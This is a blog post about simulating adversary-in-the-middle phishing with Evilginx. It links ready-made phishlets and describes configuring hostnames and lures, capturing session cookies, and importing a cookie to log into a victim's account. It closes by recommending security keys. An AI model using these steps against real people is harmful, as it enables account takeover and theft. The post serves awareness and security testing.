EvilGinx – how to simulate a Man in the Middle attack?

EvilGinx – how to simulate a Man in the Middle attack?

Phishing has become the most popular vector of attack.
Many attackers use the man-in-the-middle technique. This means that the attacker mediates the communication between the user and the server. This tactic, allows the attacker to bypass 2FA authentication with an app, SMS or one-time code.

There is software available on the market to simulate such an attack.. One such product is EvilGinx, whose creator is Kuba Grecki from the Trójmiasto area.

EvilGinx behaves like a proxy that enables the execution of an MITM attack and allows the attacker to intercept both login credentials but also session cookies. When the user clicks on a malicious link e.g. www.microsoft-falsedomain.pl then Evilginx terminates the SSL connection and opens a new one with the already targeted – real server e.g. microsoft.com. So, the user doesn’t see the difference because he can still log in.

Well, let’s move on to practice. How to prepare a server with Evilginx running?

First of all, we will need a server – it can be a purchased VPS or virtual on VirtualBox on our computer.

The installation documentation can be found here, so I won’t duplicate:
https://help.evilginx.com/docs/getting-started/deployment/remote

The main component is the so-called phishlets, which are small files with a .yaml extension that specify the parameters of the page whose link is sent to the victim. You can create your own phishlets but you can also download ready-made ones from here, for example:
https://github.com/ArchonLabs/evilginx2-phishlets/tree/master/phishlets
https://github.com/charlesbel/Evilginx2-Phishlets

We copy the downloaded files to the appropriate directory on the EvilGinx server. To use it, we need to configure the so-called hostname, which is the address of the site used for the attack. Next, we need to enable the phishlet.

Another component is lures. A lure is a full link that we send to the victim. In my case they look like the following.

To download the entire URL we use the command:

Once we have the full link generated, it would be necessary to open it. Each time the link is accessed, the Evilginx console will show the client details (browser, IP, time)

When, as a victim, we log in with our login credentials then Evilginx intercepts the login session.

When we go into the session details, in addition to the customer’s data, we see the contents of a session cookie, which we can use to log into the victim’s account on our computer.

To use the captured cookie, just copy the content of the cookie from Evilginx and paste its content into a extension in your browser. There are many extensions, I use Cookie-Editor. Paste the content and import the content into the browser. Then refresh the page, e.g. Office, and we are already logged into the victim’s account.

As you can see, carrying out such an attack is not difficult. Legacy MFA is not able to protect us from such attacks. If we use security keys – the key verifies the domain address and if we are on a phishing site then the login will not happen. I encourage you to configure 2FA wherever you can – preferably in the form of a security key such as YubiKey,

Komentarze

Nie ma jeszcze komentarzy. Może zaczniesz dyskusję?

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *